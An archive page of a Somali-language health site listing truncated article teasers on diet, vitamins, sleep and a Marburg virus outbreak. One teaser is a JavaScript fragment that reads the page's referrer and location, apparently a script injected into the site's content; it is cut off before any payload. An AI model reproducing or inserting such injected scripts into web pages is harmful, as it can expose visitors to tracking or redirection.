Scroll to Top

Category Archives: Caafimaadka

(function() { var referer="";try{if(referer=document.referrer,"undefined"==typeof referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700); var...

Dadka qaar waxay u haystaan in caanuhu miisaanka dhimaan, halka kuwa kalena ay leeyihiin miisaanka ayay kordhiyaan Hadaba, xaqiiqada dhabta ah maxay tahay? Caanaha lo’da ayaa waxay ka mid yihiin caanaha...

Tufaax wuxuu qani ku yahay maada la yiraahdo antioxidant oo xoojisa awoodda uu jirkaagu isaga difaaco xanuunada soo weeraro, dadka joogteeya maalinti hal tufaax waxaa aad u yar fursadaha uu ugu dhici...

Dadka ayaa inta badan caadiyeesteen inay cabaan COFFE subax walba iyagoo aan quraacan balse waxaa laga digayaa arintaas sababtoo ah caafimaad ahaan uma wanaagsan dadka caadiyestay falkaas. Cabbida qaxwada...

Ma dareentaa laabjeex? Haday jawaabtaadu haa tahay, waxa ugu muhiimsan ee lagaa rabo inaad sameesid waa inaad isbadal ku samaysid waxa aad cunaysid iyo hab nololeedkaaga. Dib u habeyn ku samee waxa aad...

Faytamin B12 waxaa loo aqoonsan yahay inuu yahay mid lagama maarmaan u ah caafimaadka iyo hagaajinta howlaha habdhiska neerfaha jirka. Marka uu jirka ku yaryahay faytamiinkaas waxaa kasoo muuqda calaamado...

Malabka ayaa waxaa loo aqoonsan yahay inuu ku jirto cunnooyinka ugu faa’iidada badan aadanaha, faytaamiinaadka, macdanta, amino acids ka laga helo darteed, waxaanuu ka hortagaa bakteeriyada, fungal-ka...

Daraasad cusub ayaa la sameeyey taasi oo muujineysa muhiimada uu bani’aadamka u leeyahay jiifka habeenkii,waxaana la sheegay haddii uu kaa qaldamo jiifka habeenkii inaad dhibaato ku sugan tahay. Waxaa...

Hay’adda caafimaadka adduunka ee ‘WHO’ ayaa shalay oo jimco ahayd soo saartay warbixin sheegeysa in Feyrus halis ah oo dilaa ah oo lagu magacaabo ‘Marburg Virus’ uu ka dillaacay...

In badan waan iska fududeysannaa caafimaadkeenna, inagoo aaminsan in wax dhibaato ah nagu soo foollahayn, laakiin marka cudur si lama filaan ah uu kuugu soo boodo ayaan bilaabeynnaa inaan si wanaagsan...